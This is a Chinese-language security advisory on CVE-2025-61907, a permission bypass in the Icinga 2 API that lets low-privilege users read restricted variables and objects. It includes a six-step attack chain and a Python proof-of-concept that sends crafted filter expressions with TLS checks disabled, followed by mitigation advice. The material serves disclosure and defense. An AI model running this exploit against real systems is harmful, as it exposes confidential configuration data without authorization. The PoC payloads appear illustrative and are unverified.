CVE-2025-61907：Icinga 2 API对象端点权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-61907

漏洞类型

信息泄露/权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Icinga 2

漏洞概述

CVE-2025-61907是Icinga 2开源监控系统中存在的一个中危信息泄露漏洞。Icinga 2是一款广泛使用的开源网络监控系统，用于监控网络基础设施的可用性和性能。该漏洞存在于Icinga 2的多个版本中（2.4至2.15.0），具体涉及API的/v1/objects端点。攻击者作为经过认证的API用户，可以通过精心构造的过滤表达式（filter expressions），访问到本不应该对其可见的变量或对象。具体而言，该漏洞允许低权限用户绕过Icinga 2的权限控制机制，获取全局变量（即使其未获得variables权限）以及其他对象或查询结果（即使其未获得对应的objects/query权限）。这意味着经过认证的低权限用户能够读取到系统中其他用户的敏感配置信息、全局变量值以及其他受保护的对象数据。该漏洞的CVSS 3.1评分为6.5分，表明其对机密性具有较高影响，但对完整性和可用性无影响。该漏洞已于2025年10月16日披露，并在Icinga 2 2.15.1、2.14.7和2.13.13版本中得到修复。

技术细节

Icinga 2的API提供了/v1/objects端点，允许用户通过过滤表达式（filter expressions）查询系统中的各种对象和变量。正常情况下，Icinga 2会根据用户的权限配置（如variables permission、objects permission、query permission等）来限制用户可以访问的数据范围。然而，在受影响的版本（2.4至2.15.0）中，过滤表达式的解析和执行逻辑存在缺陷。具体而言，当用户提交带有特定过滤条件的API请求时，系统在执行过滤表达式进行对象匹配的过程中，未能正确地应用权限检查。这意味着即使某些变量或对象不在用户的权限范围内，用户仍然可以通过构造特定的过滤表达式来间接访问这些数据。例如，攻击者可以利用过滤表达式中的变量引用或对象引用机制，绕过权限控制层，读取到全局变量或其他受限对象的内容。由于该漏洞仅涉及信息读取（机密性影响），不涉及数据修改或系统破坏，因此完整性和可用性不受影响。攻击者需要拥有有效的API凭证（低权限即可），通过网络向/v1/objects端点发送精心构造的请求即可利用此漏洞。

攻击链分析

STEP 1

步骤1：获取API凭证

攻击者获取Icinga 2 API的低权限用户凭证，可以通过钓鱼、社会工程或其他方式获得合法的API认证信息。

STEP 2

步骤2：分析API权限

攻击者了解目标Icinga 2实例的API配置，识别当前用户被限制访问的变量和对象类型。

STEP 3

步骤3：构造恶意过滤表达式

攻击者精心构造包含受限变量或对象引用的过滤表达式，利用/v1/objects端点的过滤逻辑缺陷。

STEP 4

步骤4：发送API请求

攻击者通过认证的API会话向/v1/objects端点发送带有恶意过滤表达式的POST请求。

STEP 5

步骤5：绕过权限检查

由于过滤表达式的求值过程中未正确应用权限控制，系统返回了本不应向该用户可见的变量值和对象数据。

STEP 6

步骤6：提取敏感信息

攻击者从API响应中提取敏感信息，如全局变量值、其他用户的配置数据、受限对象信息等，用于进一步攻击或情报收集。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61907 PoC - Icinga 2 API Object Filter Permission Bypass
# This PoC demonstrates how an authenticated low-privilege user can
# access variables/objects that should be restricted by their permissions

import requests
import json

# Configuration
ICINGA2_HOST = "https://icinga2-target.example.com:5665"
API_USER = "low_privilege_user"
API_PASSWORD = "user_password"
API_ENDPOINT = f"{ICINGA2_HOST}/v1/objects"

# Step 1: Authenticate and obtain API access
# The attacker uses valid low-privilege API credentials
auth_headers = {
    "Accept": "application/json",
    "X-HTTP-Method-Override": "GET"
}

# Step 2: Craft a filter expression that bypasses permission checks
# The filter expression references variables or objects that the user
# should not have permission to access directly
# By using filter expressions, the server evaluates them with elevated
# context, bypassing the normal permission restrictions

# Example 1: Access global variables without variables permission
payload_global_vars = {
    "attrs": ["__name", "value"],
    "filter": "match(\"icinga2\", object_name)",
    "type": "Variable"
}

# Example 2: Access objects without proper objects/query permissions
payload_restricted_objects = {
    "attrs": ["__name", "address", "check_command"],
    # Filter expression that references restricted object types
    "filter": "typeof(object) == \"Host\" && match(\"*\", host_name)",
    "type": "Host"
}

# Step 3: Send the crafted request to the vulnerable endpoint
try:
    response = requests.post(
        API_ENDPOINT,
        auth=(API_USER, API_PASSWORD),
        headers=auth_headers,
        json=payload_global_vars,
        verify=False
    )

    print(f"Status Code: {response.status_code}")
    if response.status_code == 200:
        results = response.json()
        if results.get("results"):
            print("[+] Successfully accessed restricted global variables!")
            for item in results["results"]:
                print(f"  Variable: {item.get('attrs', {}).get('__name')}")
                print(f"  Value: {item.get('attrs', {}).get('value')}")
    else:
        print(f"[-] Request failed: {response.text}")

except Exception as e:
    print(f"[-] Error: {e}")

# Note: The vulnerability exists because the filter expression evaluation
# does not properly enforce permission checks on the variables/objects
# being referenced during the filtering process.
# Fixed in versions: 2.15.1, 2.14.7, 2.13.13

影响范围

Icinga 2 >= 2.4, < 2.13.13

Icinga 2 >= 2.14.0, < 2.14.7

Icinga 2 >= 2.15.0, < 2.15.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查所有API用户的权限配置，严格限制其variables、objects和query权限；2）监控API访问日志，关注异常的/v1/objects端点请求；3）限制API的网络访问范围，仅允许可信网络访问；4）临时禁用不必要的API用户账户；5）考虑在反向代理层面添加过滤规则，限制复杂过滤表达式的提交。